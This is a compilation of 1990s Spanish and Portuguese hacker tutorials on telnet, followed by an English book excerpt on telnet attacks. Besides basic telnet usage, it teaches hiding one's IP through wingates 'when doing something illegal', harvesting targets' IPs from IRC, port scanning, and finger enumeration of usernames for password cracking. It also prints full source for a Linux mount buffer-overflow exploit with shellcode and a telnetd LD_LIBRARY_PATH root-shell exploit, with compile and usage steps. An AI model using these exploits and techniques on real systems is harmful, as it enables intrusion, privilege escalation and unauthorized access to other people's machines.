Introduccion a telnet
Por Teken Melocotoff
Creado el 5/29/99
Weno, ya que hicimos esto vamos pa encima. Dado que Windoze es el sistema opertivo mas utilizado, dirijire mi documento a la utilizacion de telnet en window, aunque en realidad la differencia en telnet en los sistemas operativos es minima. Es mas, si quieren experimentar la forma mas basica de telnet, no hay mas que hacer que ir a dos , y desde el directorio windows teclear telnet. Claro es linea de commando, pero todas las opciones que hare con el telnet de winsuck se pueden hacer en msdos, linux, unix, etc, con la unica differencia que no hay una pantallita bonita donde hacerlo. Weno vamos a arrancar telnet. 
Para inicializar telnet desde windows no hay mas que hacer que ir a start/inicio luego run/ejecutar/correr/como lo quieran llamar y teclear telnet.exeotelnet. Si son aun mas peresozos pueden buscar el icono de telnet dentro de la carpeta de windows y pegarla en el desktop. Ya. No jodan. 
Una vez que lo inicializan, veran una pantalla con las opciones Connect/conectar edit/editar terminal y finalmente, Help. Recommiendo que antes que hagan cualquiera peripecia, o que continuen esta lectura, que se lean el help, y luego sigan leyendo. Sigamos explorando las opciones de telnet. 
Connect 
En la opcion connect veremos Remote system(sistema remoto), disconnect, y exit. 
Seleccionemos sistema remoto. Aparecera una ventana con las opciones hostname, port, y terminal type. Por terminal type no nos preocuparemos solo tienen que saber que es un estandard y por lo tanto van a ser raras las ocassiones en que tenga que modificar esta seleccion. Bueno entonces trataremos con hostname antes que nada. 
En host name va el nombre del host, ya sea en numeros ip( 127.0.0.1) o en reverse ip (koan.happyhacker.org) por ejemplo. El hostname no es nada mas que la dirreccion a que se desea conectarse. 
Port: Esta seccion define el puerto a que conectarse. Su maquina, y todas las maquinas del mundo, tiene dos tipos de puertos, fisicos y logicos. Los puertos fisicos serian como los puertos para printer, keyboard, mouse, monitor, etc, etc. Los puertos logicos son programas(por decirles asi) que esperan que llegue cierto tipo de informacion, o que alguien se les conecte para proveerle cierto tipo de informacion. Por lo tanto, conectarse al puerto 23 les da una terminal de telnet, mientras que si se conectan al puerto 25 les conecta con el daemon de smtp, y si se conectan al puerto 79 les da el servicio de finger, y si se conectan al puerto 80, y saben que hacer, pueden navegar por la internet, claro, sin dibujitos bonitos ni nada. 
Koan.happyhacker.org(esta es una warbox de happyhacker, asi que se pueden conectar todo lo que quieran) si se conectan al telnet les aparece una ventana que les pregunta por su login y pass( despues hablaremos de esto, pero si quieren entrar, vean mis links a happyhacker, o vayan directamente a ellos y LEAN ) si cambian donde dice telnet a 23, se conectaran de nuevo con koan. Si en hostname ponen sinfo.net y colocan en port 25, se conectaran a servicio de smtp de sinfo.net, y este les dara una advertencia sobre lo que puede pasar si se la pasan de listos( eso esta ahi porque no me supe quedar callado, y por lo tanto, perdi un servidor de fakemail que me pudo haber servido muy bien....>:( weno ni modo). Para desconectarse solo aprienten desconnect o exit. Vayamos a edit ahora. 


Edit: 
en esta opcion se les permite las opciones copy paste y seleccionarlo todo. En tal caso que esten en una session que les interese estudiar posteriormente, solo hagan uso del cut y paste y select all(en realidad no creo que tenga que explicar como usarlos, si no sabes, toma un curso de winblows y no jodas.) 
Terminal: 
En esta opcion tendremos la oportunidad de mejor configurar el funcionamiento de telnet para que nos sirva mejor. Aqui se presentan las siguiente casillas y elecciones: 
preferences 
start logging 
stop logging 
Dentro de preferrencias tenemos varias opciones, y un menu de help. Leanse el menu de help y no joroben, pero si les dire esto. En buffer size ponganlo a lo maximo, o sea 9999( esto es para que pueden tener un txt buffer de buen tamaño, y asi pueden hacer cut&paste todo lo que quieran si no quieren usar los logs de telnet) y eco local lo usaran de vez en cuando. Por ejemplo cuando se conecten a un servidor y en su pantalla no aparece lo que estan tecleando, activen el local eco. O si todo lo que escriben aparece repetido, apaguen el local eco y ya esta. Con las demas opciones, no jodan el terminal type, dejenlo en vt-100, y con los coloritos y el font hagan lo que quieran, ya lo demas no importa. 
Start login y stop login: 
Esta opcion nos permite mantener logs de todo lo que hagamos en telnet. Es bastante util, pero aveces no queremos que salga todo, solo secciones. Ahi es donde haran cut&paste. Cuando quieran desactivar el log de una session solo hagan Stop logging y ya. 
Help: 
Ya saben pa que es. 
Bueno ahora entienden mas o menos el manejo de telnet. Si quieren conectarse a alguna maquina, haganlo, no es illegal. Pueden conectarse a una maquina todo lo que quieran,PERO, esto puede crear sospechas, y el administrador del sistema, si se siente muy paranoico y neuroastenico ese dia, puede con todo derecho desconectarte la conexion( aunque la mayoria de ellos ya han programado a los daemons a que se desconecten despues de cierto tiempo si no es una conexion que este permitida) y si eres DEMASIADOinsistente en tu exploracion, talvez pueda llegarle una cartica a administador de tu sistema detallando lo que estabas haciendo y cuando( aunque enrealidad, si eres un newbie, no hay mucho que puedas hacer que te incrimine de algo). Sugiero esto. Si van a hacer portsurfing( conectarse a distintos puertos en la misma o distinta maquina para ver que puertos tiene abierto) que lo hagas en forma intercalada. O sea, hoy te conectas a un sistema, y pasas 5 minutos surfeando sus puertos, luego vas a otra ma quina o te desconectas por 10-15 minutos, y luego vuelves a la maquina original y sigues explorando. 
Claro tambien existe la posibilidad de utilizar un port scanner( un progammilla que se especializa en hacer el port surfing por ti, y te reporta cual puertos estan abierto y que daemons tienen ahi) y hara lo mismo y mucho mas rapido, pero de igual forma te digo que no abuses. Si alguien se percata que estas rondando mucho su maquina lo mas problable es que cierren los puertos para evitar un ataque.Bueno eso es todo para telnet. Son muchas las posibilidades que tiene, y entre mas poderoso tu sistema operativo, lo mas problable que puedas hacer mas travesuras con telnet, y que te salgan mejor. 
Teken Melocotoff 
Escogamos. Seremos lobo, oveja, u pastor. 



Telnet 1
 - By Daimon

Texto creado para http://surf.to/daimon
        y para la web http://personal5.iddeo.es/hackers/index.htm

                                                                     .*.*.*.* INTRODUCCIÓN *.*.*.*.


Lección 0 -(Solo para los que no pueden masticar y respirar al mismo tiempo)

Vereis el telnet es un programa de lo más gracioso cuya función es sencillamente acceder desde un equipo remoto (remoto = que esta unido al blanco solo por la red) a otro ordenador en cualquier punto del planeta, a traves de los puertos (comunican a los ordenadores con la red).
 
Cada uno de estos puertos hace una cosa diferenete algunos controlan el e-mail otros sirven para ver las páginas webs, etc... , y nuestro objetivo es usarlos para fines o bien malvados o bien de seguridad por ejemplo para cubrir nuestra IP (que seria nuestra huella dactilar en internet para que nos entendamos)

El windows incorpora un telnet precioso pero poco potente que tiene el original nombre de telnet.exe y que se encuentra en C:\WINDOWS\TELNET.EXE
Lección 1ª-

  La técnica del Telnet empieza como todas las técnicas es decir, con la elección de un blanco al que atacar, este blanco es una maquina (que nadies os diga otra cosa) ya sea un pc como el tuyo y el mio o una maquina tan potente como la del vaticano el pentagono o la churreria de la esquina, por que os digo esto? facil para romper el hielo y para que entendais el telnet como algo en principio legal y que puede ser usado para fines no tan legales.

empezaremos con algo sencillo vamos a cubrir nuestra IP empleando una técnica llamada Wingate que he aprendido recientemente en el io enzine que encontrareis en:

http:/bounce.to/links/                                       
Vereis el wingate no es un ataque ni mucho menos pero probablemente apartir de ahora cuando vayais a hacer algo ilegal (no hagais nada ilegal) usareis esta técnica para evitar ser detectados o incluso para entrar en el IRC y que no se sepa vuestra IP (si alguno no entendeis esto pillaros el texto de IRCwar que he creado y encontrareis en http://surf.to/daimon/ y en http://lapaginadekites/ ) venga vamos al tema como empezamos.

Lección 2ª-

La tecnica del wingate?) 

¿Como camuflo mi IP?

Ponle unas ramitas en el casco para empezar que eso siempre ayuda mucho y despues busca en internet un escaneador de wingates y dado que esta información esta sacada del IO ezine de 
http://bounce.to/links    

lo mejor es que lo busques ahi en la base de datos de wingate (que la tiene te lo garantizo) bueno os lo bajais y aprendeis a usarlo  (tendreis un documento sobre el manejo del programa muy pronto lo garantizo).

Asi que lo que hacemos es

c:\>telnet nuestra ip
c:\>telnet proxima IP puerto(opcional) 

que es lo que hemos hecho? sencillo, con telnet wingate hemos accedido hasta nuestro wingate, despues ponemos la siguiente ip a la que acceder y siqueremos el puerto para hacerlo asi que cuando alguien en el IRC (o en otro sitio) quiera sacar nuestra IP le dara la IP de la maquina/as atraves de las cuales nos hemos conectado (logicamente cuantas más maquinas atravesemos más dificil sera localizar nuestra IP) es importante que uses un wingate antes que nada


Lección 3ª

Encontrar un blanco y puerto para hacerle telnet. necesitais una dirección IP ( nota para kultura jeneral una dirección IP va desde 255.255.255.255 hasta 000.000.000.000 ) asi que lo más facil es que las saqueis del IRC para empezar 

¿Como coño saco una IP del IRC?

/dns NICK (fácil verdad) 

¿Ein?

en donde habitualmente escribes ¿por que sabes escribir pon /dns nick  
por cierto en lugar de nick pon el nombre de la persona de quien quieres sacar la IP

¿Y ahora como saco el puerto para atacar?

muy fácil solo tienes que usar el portscan que tienes en http://surf.to/daimon/ y esperar a que te diga que ha conectado con algun puerto yo creo que el manejo del programa es sencillisimo asi que paso de explicarlo de todas maneras puedes intentar el acceso a cualquier puerto aunque no ponga que esta abierto.








 
Lección 4ª

Bueno ahora que ya teneis un blanco 195.46.52.129 , al que supondremos con un puerto abierto, empezariamos con el telnet, abrimos el telnet de windows que hemos localizado antes. y que tenemos delante?

una gran pantalla en blanco, pulsemos sobre:

Conectar 
Sistema remoto...

nos sale una ventana más pequeña con los siguientes huecos:

Nombre del host: (aqui pondremos la IP) 
Puerto: (El puerto que tenga abierto)
Tipo de terminal: (deja el que haya)

veamos nuestro ejemplo:

Nombre host: 195.46.52.129
Puerto: 23 (el de telnet)
Terminal: vt100

y le damos a conectar

y ahora a esperamos mientras conectamos al blanco

vereis para que podais coger algo del disco duro, este ordenador deve tener recursos compartidos, es decir estar protegido con un password o mal configurado, (y que os deje entrar por la cara), esto solo lo podreis hacer en unos puertos y no en otros, en el 80 por ejemplo podreis abrir una página web, en el del ejemplo, hariamos un finger, ayer estube trasteando con el ordenador del mec (Ministerio de Educación y Kulturra) y pude conectar en varios puertos entre ellos el 80, pero no pude en el de whois esto significa que el que ha configurado el mec, se ha cuidado de que saques datos que se supone no deves conseguir, una vez conectado, yo te recomiendo cuatro comandos que son imprescindibles

?
help 
hello
man

estos comandos son los primeros a teclear al conectarte con el server. Ahora una lista de comandos que en general podreis usar en un host remoto (con un poco de suerte)

ls ---------------------------------------------- Este comando lista todos los archivos y directorios en el directorio actual donde está localizado.  

cd <directorio> --------------------------  Este comando cambiara su directorio actual por el directorio que usted especifique en <directorio>. Un                      		  	        ejemplo sería "cd public_html" lo llevaría al directorio public_html. 

mv <archivo> <directorio> ----------  Este comando moverá un archivo de su lugar actual dentro del directorio actual al directorio especificado. 			       Por   ejemplo, digamos que usted está en el directorio public_html y usted quiere mover un archivo 			       llamado  "link.cgi" a su directorio "cgi-local".  En el indicador usted escribe "mv links.cgi cgi-local". 

chmod XXX <archivo o directorio>  Este comando fija los permisos a un archivo o directorio a los permisos que usted desee. Las "XXX" serán 			      reemplazados por verdaderos números, como decir 644. Por ejemplo, si quisieramos fijar los permisos en 			      nuestro archivo links.cgi en nuestro directorio cgi-local, entonces primero entraríamos al directorio y luego 			      escribiriamos "chmod 755 links.cgi" en el indicador. 
			      
rm <archivo o directorio> ----------- Este comando borrará un archivo o directorio que usted especifique. Si quisieramos borrar un directorio 			      llamado "usuario", entonces escribiriamos "rm usuario" en el indicador. 

man <comando> --------------------- Este es uno de los más comandos útiles para nuevos usuarios.  Permite ver todas las opciones de dicho 			     comando. Por ejemplo, si escribieramos "man ls", nosotros entonces veríamos todas las diferentes                                  		     opciones disponibles para el comando de listar (ls). 

traceroute <dominio> --------------  Este comando ejecuta un busca ruta (traceroute) con un dominio en particular para ver cuantos brincos lleva 			     llegar desde su localidad hasta el dominio especificado. Un ejemplo podria ser "traceroute yahoo.com", el 			     cual le dará a conocer cuanto  se tarda que la información llegue a yahoo.com y como llega. 

whois <dominio> -------------------- Este comando le despliega la información actual de los registros de InterNIC incluyendo administrativos, 			    técnicos, y contacto de cobro, para un dominio en particular si ya tiene dueño. 

otra cosa que no os he comentado que para que podais trastear con el HD de nuestro blanco aparte de tener el su C: compartido y sin contraseña nosotros devemos tener compartido nuestro C: e impresora pero evidentemente bien configurados.

Bueno creo que con esto el hacer telnet queda esplicado o casi... asi que que la fuerza os acompañe, a si solo una cosita más, no useis el telnet del windows ( es la peste ) usad algo un poco mejor como el CRT : ) bueno pues nos vemos espero que este textillo no os lleve a la carcel como tanto se encargan de recordarnos las guias basicas del hacker 

En la proxima entrega hablaremos de una vez conectados como me hago con el control que en esta parte se ha quedado medio olvidado de todas maneras os recomiendo que busqueis nº atrasados del Zed ezine  creedme valen la pena.

Telnet 2
	BY
**////// Daimon \\\\\\**

	http://surf.to/daimon/

Hola de nuevo bien en la parte anterior de este texto explicaba como se hace telnet y wingate (ojo que el wingate tiene muchos fallos : ) bueno pueds en esta parte explico como se accede a un pc
aprovechando el telnet.

Bueno como ya sabeis el telnet es para trabajo remoto pero windows no deja que ejecutes nada dentro de el ordenador al que te conectas (se sobre entiende que su windows no te deja) el caso es que los famosos Exploits (programas en C que se compilan en otro ordenador y se ejecutan desde el tuyo) no funcionan en windows y claro a la hora de acceder desde telnet a un ordenador remoto con windows tendremos que hacerlo de un metodo casi adivinatorio, es decir o bien el usuario del ordenador atacado es tonto (muy tonto) y tiene compartir discos duros sin clave o con una clave y loggin estupidos, o le mandamos un trojan y que lo ejecute o no podremos entrar almenos con mis conocimientos : ). 

De todas maneras no os preocupeis los servidores de internet (el mec por ejemplo) usan Unix asi que de los windows casi que pasamos

Algunos os preguntareis si los exploits no rulan en los windows por que se usa Unix :) fácil porque si tu eres un servidor de internet que esta Siempre On, como VenenoCola, no te puedes permitir que el S.O se cuelgue, aparte el Unix es mucho más robusto para defenderse de ataques que un windows que hay unos 2.000.000 de maneras de hacer que se cuelgue :) de hecho todos los nukes que conozcas son una de ellas, por otro lado Unix es multiusuario y multitarea (vamos que al contrario que windows es capaz de hacer varias cosas a la vez y con varios usuarios) si ya se que windows se supone que es multitarea (despues de instalarlo no te da mas que trabajo) y ya para terminar con esta cosilla sobre S.O decir que aparte en Unix un Administrador se da cuenta de los accesos y controla personalmente la seguridad.

Bueno ahora empezamos con lo de lograr el control de un Unix o Linux hay un monton de textos por ahi, sobre esto de gente que sabe muchisimo más que yo asi que esto solo sera una introducción a lo basico, asi que despues te lees este texto Hackear Unix by Raven Spirit lo encontraras tambien en http://surf.to/daimon/

bueno vamos a ver voy a explicar que es un exploit

un Exploit ya lo he dicho antes es un programa que deves compilar en el PC que atacas, y lo ejecutas, esto lo que hace es darte acceso al HD (generalmente claro) pero no es tan fácil claro porque es posible que el bug del que se aprovecha el exploit no funcione por que tenga un buen administrador :) y tu piensas bueno pues mala suerte a por otro :) ha ya la has cagado en el sistema al que has atacado ha quedado tu acceso y un monton de logs con todo lo que hagas en el pc, si incluido la utilización del exploit, te han cazado, bueno ahora que sabes lo fácil que es dejar huellas en un Unix o Linux comprenderas por que no debes andar ejecutando exploits sin saber por que funcionan ni que borrar si logras acceder al PC :) 

asi que haz aqui una pausa y leete el texto Hackear Unix by Raven Spirit :)

bueno los que me hagais caso ya sabreis esto pero voy a explicar como se ejecuta y se compila un exploit :)

bueno pues vamos a explicalo entonces:

los que hayais navegado un poco por Internet habreis bajado o visto que los exploits no son mas que texto  o vamos mas concretamente son codigo c escrito en un archivo de texto :) bueno pues solo teneis que convertirlos a codigo C para lo que vais a necesitar un compilador de c, no se trata de generar un exe en tu PC sino de generar un .c, siento no poder explicaros en detalle como hacer un archivo c, por que yo se poco de C y solo uso un compilador asi que casi seguro que meteria la pata al explicarlo pero vamos que se hace con un compilador. 
Bueno este exploit (el archico.c que habeis generado con el compilador) teneis que subirlo por ftp a un sistema Unix o Linux que quereis atacar, compilarlo dentro de el con la instrucción:

% cc -o loquesea loquesea.c
% loquesea

Para los que os hayais asustado con lo de los logs teneis que saber que por hacer telnet a un ordenador (da igual el puerto) nadie os va ha meter en la carcel, si es vuestro servidor de internet igual os quita la cuenta pero eso en un caso extremo. Los exploits dependen de la versión del daemon (programa que corre en un puerto) que utilice el ordenador al que atacamos con el, asi que es buena idea curiosear mucho antes de atacar y poner cosas como:
?
help
hello
para que el daemon nos responda y sepamos que programa es. :)

creo que esta todo más o menos explicado me encantaria poneros exploits para que trasteeis de hecho lo iba a hacer pero mi conciencia a gritado algo asi como !!! Si les dices como entrar lo haran y aun no saben cubrir sus huellas !!! ¡¡¡ Les pillaran a todos !!! y luego he pensado que diablos yo no soy vuestra madre : ) y ya os he avisado de lo que os puede pasar asi que os pongo un par de exploits para que mireis el codigo, y no los useis que eso seria ilegal claro :)

Sacado del texto unixhack by raven Spirit, es el mount, y funciona en casi todos los linux:

<-------------------------------------CORTAD AQUI--------------------------->

/* Mount Exploit for Linux, Jul 30 1996
Discovered and Coded by Bloodmask & Vio
Covin Security 1996
*/

#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/stat.h>

#define PATH_MOUNT "/bin/umount"
#define BUFFER_SIZE 1024
#define DEFAULT_OFFSET 50

u_long get_esp()
{
  __asm__("movl %esp, %eax");

}

main(int argc, char **argv)
{
  u_char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";

   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   int i;
   int ofs = DEFAULT_OFFSET;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;

   /* fill start of buffer with nops */

   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);

   /* stick asm code into the buffer */

   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];

   addr_ptr = (long *)ptr;
   for(i=0;i < (8/4);i++)
      *(addr_ptr++) = get_esp() + ofs;
   ptr = (char *)addr_ptr;
   *ptr = 0;

   (void)alarm((u_int)0);
   printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");
   execl(PATH_MOUNT, "mount", buff, NULL);
}
<--------------------------------------FINAL-------------------------------->
/* Exploit para el agujero de telnet. Uso freebsd libcrypt para este ejemplo
   porque libcrypt es mas peque¤o.
   Compilara/lincara las opciones en otras maquinas.
   Para compilar:
        cc -c -fpic libc.c
        ld -Bshareable -o libcrypt.so.2.0 libc.o

   Ahora, si LD_LIBRARY_PATH apunta a algun sitio esto hace, guess que? ...

        % cp libcrypt.so.2.0 /tmp/
        % telnet
        telnet> env def LD_LIBRARY_PATH /tmp
        telnet> env exp LD_LIBRARY_PATH
        telnet> open localhost

        Holey Unix, Batman!  (target.org)

        login: rewt
        Password: xxx
        leet...
        #
_H*/
        

#include <stdio.h>

static void just_do_me()
{
  setuid(0);
  setgid(0);
  puts ("leet...");
  fflush (stdout);
  sleep (1);
  execl ("/bin/sh", "yow!", 0);
}

char * crypt (x,y)
  char * x;
  char * y;
{
  just_do_me();
}
<------------------------------------- final --------------------------->

Bueno en el anterior habia un fallo si encontrais alguno en este mandad un mail a daimon@ole.com 
idem si lo publicais o quereis algo.

Telnet 3
Clique em conectar , depois em Sistema Remoto. Aí você verá a tela em que está Nome do Host , porta ,e tipo do terminal. Até aí não há nada hacker.Mas essa coluna veio justamente para interferir nesse ponto. Em Nome do Host ,digite o nome de uma provedora que você queira contactar.Em PORTA , vc apaga o Telnet e escreve FINGER ou 79 .O fato de você escrever finger é porque esse comando/porta permite saber algumas infos interessantes sobre usuários..administrador do sistema,etc. Então clique em Ok. O que deve acontecer ?&iquest;? Há varias possibilidades,mas principalmente duas : 
-Aparece a mensagem "CONEXÃO AO HOST FOI PERDIDA" (aí o computador host está bloqueando a porta 79(finger) e não adianta fazer nada. 
-Aparece um prompt esperando um comando qquer... aí você pensa: Vou dar mil comandos e ser o Kevin Mitnick...não é por aí..normalmente o host permite apenas UM comando e depois corta a conexão. E você : Que comando eu dou ?? Há alguns prioritários,como : 
@ 
0 
root 
bin 
ftp 
system 
guest 
demo 
manager 
Ou simplesmente pressionando <enter poderá dar muitas informações. 
Em alguns hosts o fato de vc escrever root no prompt do Telnet diz a você se o administrador do sistema está "logado" ...nesse caso..GET OUT.Em outras o fato de você digitar <enter lhe dará uma lista inteira dos usuários...fato que você pode usar para quebrar algumas senhas...ok ?? 
Para finalizar um exemplo prático: 
Abra o Telnet.Clique em conectar / Sistema Remoto . 
Na telinha , em "Nome do host" ,digite : www.estaminas.com.br 
Na porta,digite 79 ou finger . 
Clique em OK . 
Aparecerá um prompt esperando uma ação sua ...se vc digitar enter irá aparecer os administradores do sistema que estão logados.Se você tentar outros comandos , pode obter coisas legais. Então você se pergunta: Pra que isso tudo ?&iquest;? Eu respondo: Para você se familiarizar com o comando (em UNIX) Telnet...pra quando vc deixar de usar o Win95 e passar para algo de elite como o Unix , vc saberá muito o que fazer para detectar informações importantes da host que você quer hackear. 
Dica final: Tente , em lugar do finger , alguma outra porta como : 13,23,25,8000,9,7... ok ?&iquest;? 
  

Invasão por IP
Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecçãocom a internet podem estar correndo sérios riscos a não ser,é claro, que assim conectam-se propositalmente, com intenções"diversas". 
Utilizar-se de uma conecção.PPP do Win95 num provedor de acesso, significa estar disponibilizando seucomputador a todos os usuário da net. Mesmo sem o compartilhamentode arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-seao seu computador caso você esteja utilizando esse tipo de conexão 
Conecte-se à Internet utilizandoa rede Dial-Up do Win95. Se o seu provedor não disponibilizar umaconecção do tipo PPP, estas dicas não funcionarão. Verifique antes, se você possuios drivers clientes para redes Microsoft. Caso não estejam instalados,instale-os através do Painel de Controle, no ícone Redes. Verifique também se o compartilhamentode Arquivos e Impressoras está instalado. Se estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador simplesmente sabendoseu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poderá encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos. Configurar essas opçõesé simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Ali você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6comoprimário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuitos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS,você precisa criar um arquivo texto simples, utilizando-se até mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS.É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço .Se você executar o programa NBTSTAT, seguido da opção- N, você obterá essa lista, com o nome e o IP de seu Computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis ,tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede, dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador. 
  
Rede MicroSoft DOS
Comandos do MS-DOS (MicroSoft Disc Operation System ou "Cópia Mal-feita e Monousuária do UNIX"): Se você não sabia, o seu MS-DOS contêm aplicativos para REDE. Neste momento, nós vamos tentar explicar como eles funcionam e para que podem ser utilizados. Vamos a eles: 
-=PING=-: 
Vá no Prompt do MS-DOS (Menu "Iniciar", Prompt do MS-DOS), e lá, digite "ping". Alguns parametros iram aparecer. Aqui descreveremos os mais importantes: 
- t Envia e recebe mensagens até ser enterrompido. 
- n count Número de "ecos" que seram enviados ao host (endereço para os leigos). 
- l size Envia o tamanho do "buffer". 
- v TOS Tipo de Serviço. 
- r count Grava rota para contador "hops". 
- w timeout Tempo (em milissegundos) para esperar por cada resposta. 
Exemplo Útil: ping www.provedora.com.br 
Este comando te retorna o IP da provedora . Mas se você perguntar: "E daí?"... Vá na parte "Hacker" desta Home Page e leia sobre "NUKE". Após isto, você poderá dar download no "IPSCAN" e no "WINNUKE" (encontrados nesta HP também), pra fazer o quer quiser...(claro que nós esperamos que você não vá fazer nada de errado...). 
-=NET=-: 
Para maiores informações sobre os comandos NET, digite o nome do comando seguido de "/?", (não é para digitar as aspas..."). Exemplo: NET VIEW /?. Vamos aos comandos principais: 
NET CONFIG Exibe as configurações do seu atual grupo de trabalho. 
NET INIT Carrega o protocolo e os drives de adaptador de rede. 
NET HELP Exibe informações sobre comandos e mensagens de erro. 
NET LOGON Identifica você como um membro do grupo de trabalho. 
NET LOGOFF Quebra a conexão entre você e os recursos do pc em conexão. 
NET PASSWORD Troca a sua senha de logon. 
NET START Inicia serviços. 
NET STOP Interrompe serviços. 
NET USE Conecta ou desconecta um recurso compartilhado. 
NET VIEW Exibe uma lista de computadores que compartilham rescursos ou uma lista de recursos compartilhados em um computador específico. 
-=TRACERT=-: 
Traça rotas. Ele passa por vários hops antes de voltar com a resposta. 
- h Número máximo de hops para procurar o alvo. 
- j host-list Lista que descreverá a rota a seguir. 
- w timeout Tempo (em milissegundos) para esperar por cada resposta. 
-=ROUTE=-: 
Manipula tabelas de rota da rede. 
- f Limpa todas as tabelas de rotas das entradas gateway (se vc nao sabe o que é isso, acho bom procurar saber...). 
command Especifica um de quatro comados abaixo relacionados: 
PRINT - Imprime a rota 
ADD - Adiciona rota 
DELETE - Adivinha... :o)) 
CHANGE - Modifica rota existente 
destination Especifica o host para qual o comando será mandado. 
gateway Especifica gateway 
Atenção, nós não colocamos todos os comandos, portanto, digite somente o primenro comando e pesquise. E se você souber Inglês, vai ajudar bastante... E se no final deste texto você perguntar mais uma vez: "E daí?"...e daí....he he he. 
  
  


Telnet-Based Attacks
This chapter examines attacks developed over the years using the Telnet service. That examination begins with a bit of history. The Telnet protocol was first comprehensively defined by Postel in 1980. In RFC 764, Postel wrote: 


The most interesting Telnet hole ever discovered, though, was related to the environment variable passing option. The DDN bulletin on it was posted on November 20, 1995: 

A vulnerability exists in some versions of the Telnet daemon that support RFC 1408 or 1572, both titled the "Telnet Environment Option," running on systems that also support shared object libraries...Local and remote users with and without local accounts can obtain root access on the targeted system. 
Many sites suffer from this vulnerability. To understand the problem, you must understand the term environment. In UNIX vernacular, this generally refers to the environment of the shell (that is, what shell you might use as a default, what terminal emulation you are using, and so forth). 



--------------------------------------------------------------------------------
NOTE: DOS/Windows users can most easily understand this by thinking about some of the statements in their AUTOEXEC.BAT and CONFIG.SYS files. For example, variables are established using the SET command, as in SET PATH=C:\;C:\WINDOWS; (the PATH environment variable is one of several that can be specified in the DOS environment). These statements define what your programming environment will be like when you boot into command mode. Some common environment variables that can be set this way are the shell you are using, the path, the time zone, and so forth. 
--------------------------------------------------------------------------------

Changing the Environment
In UNIX, you can view or change the environment by using either the setenv or printenv command. Here is an example of what one might see on such an instruction:

> setenv

ignoreeof=10
HOSTNAME=samshacker.samshack.net
LOGNAME=tr
MINICOM=-c on
MAIL=/spool/mail/samshack
TERM=ansi
HOSTTYPE=i386-linux
PATH=/usr/local/bin:/bin:/usr/bin:.:/sbin:/usr/sbin:.
HOME=/usr/local/etc/web-clients/samshacker/./
SHELL=/bin/bash
LS_OPTIONS=--8bit --color=tty -F -T 0
PS1=\h:\w\$
PS2=>
TAPE=/dev/nftape
MANPATH=/usr/local/man:/usr/man/preformat:/usr/man:/usr/X11/man:/usr/openwin/man
LESS=-MM
OSTYPE=Linux
OPENWINHOME=/usr/openwin
SHLVL=2
BASH=/bin/bash
LS_COLORS=
_=/bin/csh
PWD=/usr/local/etc/web-clients/samshacker/./
USER=tr
HOST=samshack

This listing is a very extensive output of the command on a machine on which a virtual domain has been established. A more manageable (and more easily explained) version can be taken from a bare shell machine. Here is the output:

samshacker% /usr/ucb/printenv
HOME=/home/hacker
HZ=100
LOGNAME=hacker
MAIL=/var/mail/hacker
PATH=/usr/bin:
SHELL=/sbin/sh
TERM=ansi
TZ=US/Pacific
PWD=/home/hacker
USER=hacker

This output is from a SPARCstation 10 on which I set up a mock shell account (the first output was from a Linux box). This is a very stripped-down environment. The PATH statement (line 6) points only to /usr/bin. In practice, this is impractical because there are many more binaries on a UNIX system than those located in /usr/bin. For example, there are binaries located in /usr/sbin, /usr/bin/X11, and so forth. You can see, for example, that even the command given (setenv) was done by issuing the absolute path statement (/usr/ucb/setenv). In practice, I would have (within a day or so) set a much longer path, pointing to man pages, binaries, and perhaps even include directories. 



--------------------------------------------------------------------------------
NOTE: The PATH statement in UNIX works almost exactly as it does in DOS. Directories that you intend to be in the path must be articulated on the PATH statement line and separated by colons (instead of semicolons). By articulating these on the PATH line, you give the user access to commands within these directories (no matter which directory the user is currently located in). 
--------------------------------------------------------------------------------

Terminal Emulation
Other variables set in the preceding statements include HOME, MAIL, SHELL, and TERM. TERM, one of the most important variables, expresses the type of terminal emulation that you will be using. Because not all readers know what terminal emulation is, I want to quickly explain it.

Years ago, the majority of servers were mainframes. In those days, users did not have powerful PCs attached to the mainframe; they had terminals, which were (usually) boxes without hard drives. These were screens attached to keyboards. Behind terminals were a series of connectors, which might offer different methods of connection. One popular method was a bare-bones serial connection (we're talking primitive here: a straight serial-to-serial interface). Other terminals might sport hardwire options such as Ethernet connections.

In any event, these terminals had very little functionality (at least in comparison to the average PC). Contained on the main board of such a terminal was a small portion of memory and firmware (software hardwired into the board itself). This firmware would grant the user several options. For example, one could set the speed and type of connection, the need for local echo, and so forth. Sometimes, there were options to set the type of printer that might be used or even what port the data was to be sent from. 



--------------------------------------------------------------------------------
